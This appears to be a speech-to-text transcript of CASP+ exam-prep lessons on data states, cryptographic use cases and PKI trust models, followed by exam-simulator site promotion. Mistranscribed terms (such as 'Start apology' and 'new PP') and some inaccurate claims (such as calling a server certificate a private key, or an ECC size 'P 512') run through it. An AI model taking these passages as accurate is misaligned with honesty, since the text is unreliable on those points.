CompTIA CASP+ CAS-004 – Cryptography (Domain 1) Part 2
January 10, 2023

5. Data States (OBJ 1.7)

When developing a security architecture to protect our data, it’s important to understand that people can access or modify data at any point during its life cycle. We normally break this concept down into one of three data states data at Rest when data is being stored, data in Use when data is being processed, and this can also refer to as data in Process or Data in Transit, where data is being moved from one location to another. Data state we have is known as Data at Rest. Whenever data is physically stored on a digital format, we’re going to call this Data at Rest. For example, if I save a file to a hard drive or a thumb drive, that data is at rest when it’s not being actively accessed.

Now, Data at Rest includes information stored in databases, backups files, mobile devices, and many other storage medians. Now, to protect Data at Rest, most systems rely on symmetric or asymmetric encryption algorithms, or they use a hybrid of those two types. Data at rest. Encryption protections are going to be classified as disk level, block level, file level, or record level encryption. We use disk level Encryption to encrypt the entire volume or disk. This could be a partition or the entire hard drive. While Disk level Encryption provides confidentiality of the entire disk, it does rely on a single encryption key for the entire disk, and it does slow down the boot process and login process on a system.

BitLocker for Windows and File Vault for Mac are examples of drive level encryption technologies. Block level Encryption is similar to disk level encryption, but we use it for virtual partitions and storage area networks. File Level Encryption, on the other hand, encrypts individual files on a system. We can encrypt each file using the same key or using a different key for each file, depending on your use case. For example, employees in my company can use their own encryption key to protect their individual files prior to uploading those to our sharedrive. That way, even if other employees can see our files on the sharedrive, they can’t actually access them or read them without our unique encryption key to decode them. The final type of data at Rest encryption is known as record level encryption.

This is useful in high security databases where each individual record must be encrypted to prevent disclosures. Like File Level Encryption, record Level Encryption allows us to be very specific about the level of detail concerning which records are going to be encrypted and with which keys. Both File Level and Record Level Encryption allows us to encrypt a single file or record using a single key. But it still does slow down the opening of the file or the records because they have to be decrypted when we need to access them. Now, the second data state we have is known as Data in Use, or Data in Process. Data in Use refers to any information that’s currently being processed or is about to be processed, and therefore it’s going to be located in the computer’s Ram or cache.

To help protect this data, intel introduced automatic data encryption of all data leaving the processor and stored inside the Ram through its software guard extensions. Microsoft Windows can also encrypt data placed into Ram through its Data Protection API. Both of these techniques can help secure the data while it’s being stored in Ram awaiting processing, or while it’s being processed by the Central Processing Unit. The third data state we have is known as Data in Transit. If data is not currently being stored or processed, then the only other place it could be is in transit. Data in transit, also known as Data in Motion, refers to information when it’s moving across the network or across the system. To protect data in transit, encryption of the data or the data links needs to be utilized to protect the data’s confidentiality against network sniffing.

Now, Data in transit protections include technologies like SSL, TLS, Https, Shttp, SCT, and 3D Secure, as well as IPsec, SSL, the Secure Socket Layer and TLS Transport Layer Security are two protocols that allow us to create an encrypted tunnel between one system and another. We then are going to use these protocols to maintain the confidentiality of the data while it’s in transit from the user system over to the server. Now, SSL and TLS can be used as an additional encryption layer for many other popular protocols too, including Web, email, file transfer, authentication, and basically any other kind of traffic. Essentially, if you need to secure any protocol in the network, you can usually find a secure version of it that just relies on tunneling that protocol over an SSL or TLS tunnel.

Https connections, for example, create a fully encrypted session between a web browser and the web server using either SSL or TLS Secure. Http or Shttp, on the other hand, is going to use a different method to protect the data in transit. Instead of encrypting the entire session, Shttp is going to encrypt each message individually. Because of this, we don’t often use Shttp, and instead Https using the SSL or TLS tunnel is considered the default data intransit solution when you’re talking about web browsing. In the early adoption of the Web and ecommerce, credit card companies want to ensure that credit card data in transit was properly being secured.

To do this, Visa and Mastercard proposed the Secure Electronic Transaction, or Set protocol, which relied on a system of digital certificates and asymmetric keys. Unfortunately, this system would have required full adoption by financial institutions and merchants, and so it never really gained widespread usage. Instead, most merchants still rely on Https connections to create a secure method of payment. But in recent years, verified by Visa and Secure code by Mastercard were also added to Ecommerce, and they provide additional levels of protections. Both of these rely on the 3D Secure Protocol, which is an XML based protocol that provides additional security to payment card transactions done over Https. Now, another form of data intransit protections relies on the IPsec Protocol or the Internet Protocol Security.

This is a full suite of protocols that allows us to create a secure and encrypted tunnel between two different devices commonly used for a VPN connection. Now, IPsec relies on an authentication header or Ah that provides the authentication and integrity during the tunnel’s creation. It also has an encapsulating security payload or ESP that provides additional authentication and integrity. Plus it maintains the confidentiality of that tunnel by using encryption. Finally, IPsec requires the use of a security association known as an SA, which is the configuration of a device that’s needed to finalize that encrypted tunnel. We can use IPsec in either transport or tunnel mode.

With transport mode, it’s going to only encrypt the payload of the data packets that are routed across the network. In tunnel mode, it’s going to create an encrypted communication session where the payload, the routing information, and the header is all going to be encrypted. Cryptography is often used as a universal solution when you’re adding confidentiality, privacy, integrity, or nonrepudiation to a security architecture. So it’s really important to remember these three data states where you can apply cryptography to in order to increase the security of your network and the different techniques used with each of these three data states.

6. Cryptographic Use Cases (OBJ 1.7)

In this lesson, we’re going to discuss some different cryptographic use cases. There are several use cases that rely on implementing cryptography to add additional privacy, confidentiality, integrity, or nonrepudiation, such as in secure authentication, the use of smart cards, embedded systems, key escrow and key management, and mobile security. Secure authentication is used to recognize a user’s identity and this often relies on cryptographic techniques. At its most basic form, authentication uses a set of credentials, such as a username and a password, to authenticate and uniquely identify a user. But to secure this process, cryptographic technologies must be implemented. Otherwise the user would be entering in their username and password in plain text and it would be sent to the server in plain text where it could be intercepted by an attacker.

Also, if cryptography wasn’t used, the credentials of each user would also be stored on the server in plain text, which again is a huge vulnerability. Thankfully though, we have cryptography to help secure this process. One way we do this is by never storing the actual password in the server’s authentication systems or databases. Instead, when the user sets up their password, the system is going to utilize a non reversible encryption algorithm like a hash to store a value that represents the user’s password and not the actual password itself. Another way that cryptography is going to be used to secure this process is to transmit the user’s credentials from the user to the server for validation through an encrypted tunnel by using SSL or TLS.

In most modern networks, we rarely rely on a single factor of authentication either, so we don’t use just a simple username or password combination. Instead, we use something more secure like multifactor authentication, where we combine two or more factors to uniquely identify a user. Now, if an organization is using an authentication application or an RSA key fob that provides a new random number every 30 to 60 seconds and that acts as a secret Pin, this is actually a form of cryptography too, because it’s creating those one time use codes through an algorithm. Now, maybe your organization relies on a smart card and a Pin for its twofactor authentication.

If this is the case, those cryptographic keys are actually stored on the smart card itself and these are going to be unlocked when you put in your Pin number, accessed, and then presented to the system as authentication. Embedded systems are another use case for cryptography too. An embedded system is any system that contains both hardware and software necessary to perform a dedicated function, either independently or as part of a larger system. For example, in a manufacturing facility you’re going to find a lot of different embedded systems as part of their ICS and SCADA networks. Hashing is commonly used with these embedded systems to provide integrity checking of the messages that are being sent and received by these different systems. This is important because many of these embedded systems are going to be used to conduct actions on real world equipment, like generating power at a power plant or opening and closing valves to control the water levels near a dam.

There’s a big difference between executing a command that says open the valve 10% and 100% when it comes to having hundreds of thousands of gallons of water, right? So we want to make sure we get it right. An improper command being executed can have devastating results, such as flooding towns that are downstream of that dam by opening that valve too much. So for better security, many of these embedded systems will implement either symmetric or asymmetric encryption to protect their data as it’s traveling across a given network. But the challenge with embedded systems is that many of them are very, very old and they cannot support the latest encryption schemes.

It is still very common to find embedded systems using des for encryption, even though that was initially fielded back in the 70s or 80s, which was nearly 40 to 50 years ago. Next, let’s discuss key Escrow and key management. Key Escrow is an arrangement in which keys needed to decrypt encrypted data are held in Escrow so that an authorized third party could gain access to those keys under certain circumstances. Key management, on the other hand, is responsible for administering the full lifecycle of cryptographic keys from generation to usage to storage to archiving to deletion. Key Escrow is just one part of this key management concept and part of the overall life cycle.

When it comes to key Escrow, it’s imperative that the system that escrows the keys is properly secured and encrypted itself. Too many key Escrow systems are designed to split an Escrow key into separate pieces, and each piece is stored on a different system. This helps to prevent exploitation. When the key is needed, those two parts are recombined decrypted, and that provides you with the original key again. Finally, we have mobile security. As our organizations become more and more mobile, we have to consider the challenges with these mobile devices, too. Remember, encryption can be pretty processor intensive here. Now, most mobile devices are going to support full storage encryption by using data at rest encryption.

This usually relies on a symmetric algorithm like AES, the Advanced Encryption Standard. Now, when it comes to asymmetric encryption on mobile devices, though, we often use mobile specific algorithms. This is because mobile devices have less processing power than desktops laptops or servers. Unfortunately, security and encryption requires additional processor overhead, and therefore, many of the traditional methods of encryption are simply going to be too processor intensive for these newer devices. To overcome this processor limitation, we can use ECC. ECC is the elliptic curve cryptography, and it’s a form of public key cryptography based upon algebraic structures of elliptic curves over a finite field.

Basically, instead of relying on real numbers and complex mathematics to encrypt the data, ECC instead uses points on a graph that satisfy a single algebraic formula. Because of this method, ECC can create equivalent levels of security using much smaller keys that require less processing power. For example, a 256 bit elliptic curve public key is equivalent in strength to a 3072 bit RSA public key. ECC refers to its key sizes as 256, P 384 and P 512 equating to the number of bits in their respective keys. So, as you can see, there are a lot of different use cases that are going to rely on implementing cryptography to add additional privacy, confidentiality, integrity or nonrepudiation to our systems, such as our secure authentication, smart cards, embedded systems, keys, growing key management and mobile security.

7. PKI Use Cases (OBJ 1.7)

In this lesson, we’re going to discuss some different PKI use cases. There are several use cases that rely on implementing PKI to add additional privacy, confidentiality, integrity, or nonrepudiation, such as in Web services, email code signing federation, trust models, VPN and enterprise and security automation and orchestration. These use cases all rely on the fact that PKI supports the use of public and private private key pairs. The public key is going to be used to encrypt data that must remain private or confidential, since only the receiver’s private key can open that data. The private key is going to be used when integrity and non repudiation are our priority, since we can hash the data to ensure integrity and encrypt that hash digest with our own private key to ensure nonrepudiation by using a digital signature. Let’s do a quick review of the various use cases and how the use of PKI to achieve these goals can help us. First. We have Web Services.

Now, a web service is any piece of software that makes itself available over the Internet and uses standardized XML messaging systems. Now, XML is used to encode all communications to this web service. Every website and web service that uses Https to communicate is going to rely on public key infrastructure in order to create their secure connections. So when you build a website, a web service, or a web app, you need to install a digital certificate for your web server. This is a private key from a public private key pair. Now, the public key will remain available from a trusted central repository for all of your end users. This public key will then be used by those end users to send your server a unique random number string that will serve as a session key for an encrypted SSL or TLS session between the client and your server.

PKI can also be used by Web Services to conduct authentication. In these cases, a user’s private key can be used to encrypt the challenge from the server and then return it to prove their identity. Since the server can decrypt the challenge received from the user by using the user’s publicly available public key, they can validate the user is who they claim to be because only the user has access to the private key in a PKI system. Second, we have email. Email messages can be encrypted with the public key of the receiver to ensure confidentiality and privacy. To ensure integrity, hashing of that email message is conducted by the sender and then given to the receiver to ensure nonrepudiation. The sender of the email will encrypt that hash digest they calculated with their own private key.Now, only the receiver can read the message because it was encrypted with the receiver’s public key. But anyone in the world can read the hash digest since it was encrypted with the sender’s private key.

This is acceptable because the hash digest cannot be reversed into the initial message. Instead, this is considered a one way cryptographic function. Third, we have code signing. Code signing is the process of digitally signing executables and scripts to confirm the software was written by the author and it guarantees the code has not been altered or corrupted since it was digitally signed. The process employs the use of cryptographic hashes to validate the authenticity and integrity of the code. Code signing works just like digitally signing an email where the code developer’s private key is going to be used to encrypt the hash digest of the finished executable file or script as a means of providing non repudiation for that code and to prove it was actually released by the developer and has not changed since it was signed by the developer.

Fourth, we have federation. Now, federations are used to link a user’s electronic identity and their attributes. They’re stored across multiple distinct identity management systems into one. In the world of PKI, this is accomplished by creating a multilevel hierarchy of trust called a certificate chain. As you trace the chain upwards, you’re going to eventually reach a root certificate authority in which all trust is ultimately derived from. Because of the size and scope of the Internet and its associated identity systems, these multilevel hierarchy chains are often interlinked with other chains to create a federation. While federations don’t have to rely on PKI, they often do for much higher levels of security.

This would involve using digital certificates for authentication inside of the federation instead of just using simple usernames and password combinations. Fifth, we have trust models. Now, a trust model is a collection of rules that informs how applications can decide on the legitimacy of a digital certificate. Within PKI, there are operations and security policies as well as security services and protocols that all need to support interoperability by using public key encryption and key management certificates. There are five different trust models that are used in PKI. These are peer to peer bridge certificate authorities, hierarchical hybrid, and web of trust.

The peer to peer trust model does not rely on a centralized trust route certificate authority. Instead, the peer to peer model allows certificate users to rely on their own local CAS as the starting point of trust. When the user needs to validate another user’s certificate, it’s going to reach out to its local CA and if that local CA has a bi directional trust set up with the other user’s local CA, it’s going to be able to validate it. This is known as cross certification and it only works well with a small number of groups because there’s no hierarchy involved here. Now, a bridge certificate authority model is used to support PKI applications across enterprises and avoid having to create numerous cross certification connections. Instead, each local CA can CrossConnect over to a central bridge CA and that bridge CA can maintain all the bilateral agreements with all the other organizations local CAS on your behalf.

This model works a lot like a Start apology in networks where all the nodes connect back to a central bridge CA and they can then be redirected over to the proper local CA for that user certificate that needs validation. This helps add some hierarchy to the system without requiring a centralized CA that’s trusted by everyone, because now the central node here is simply a bridge that works almost like a switch to give the proper authentication CA to each user by doing that bi directional trust. Next, we have the hierarchical trust model and this requires a centralized root node as a starting point for all trust in the PKI system. This model is usually going to be used internally for domain environments.

If there’s a large network involved, the root CA can also connect to direct descendants, and those descendants can further connect downward to more depending on the network size. In a hierarchical trust model, every single node must trust the root CA as a source for their own authority. As well. The hybrid trust model is going to combine two or more of the models that we just discussed. For example, you could have two organizations that use a hierarchical trust model inside their own networks, but now if they want to connect the two of those together, they could do this by implementing a bridge model allowing each organization to reach out to the other through the organization’s root CA through that bilateral trust agreement.

The final model we have is known as a Web of Trust. This is a decentralized security model in which the participants are able to authenticate the identities of the other users. This concept is used with PGP, pretty good privacy, new PP, and Open PGP encryption methods, and this is not commonly used in PKI. In fact, the Web of Trust is pretty much the opposite of the more centralized PKI models that we just discussed. 6th, we have VPNs. Now, a VPN, or a virtual private network, extends a private network across a public network and enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network.

PKI is often used in conjunction with VPNs to provide authentication for remote users who are connecting to a network over a VPN. 7th, we have Enterprise and Security automation and orchestration. Automation and orchestration is the automated configuration, management and coordination of computer systems, applications and services. Orchestration helps information technology professionals more easily manage complex tasks and workflows. Automation and orchestration is essential in the implementation of PKI. These days, as more servers and assets are moved into the cloud and PKI and digital certificates are used more and more for authentication of these devices, we must use automation and orchestration to issue and implement the digital certificates across all of these devices.

After all, if we’re rapidly creating cloud based servers to meet our elastic demands and then we remove or destroy those virtual servers, we need to be able to create, distribute and revoke or destroy all those digital certificates for those virtual servers whenever they’re deprovisioned. By using orchestration and automation, we can do that. It can help simplify centralize and streamline all the digital certificates and cryptographic key tasks from discovery and inventory to renewals, revocations, installations, monitoring and much more. This also provides you with a simplified and consistent visibility and control over PKI by centralizing your certificate and key lifecycle management functions.

Leave a Reply

How It Works

Step 1. Choose Exam
on ExamLabs
Download IT Exams Questions & Answers
Step 2. Open Exam with
Avanset Exam Simulator
Press here to download VCE Exam Simulator that simulates real exam environment
Step 3. Study
& Pass
IT Exams Anywhere, Anytime!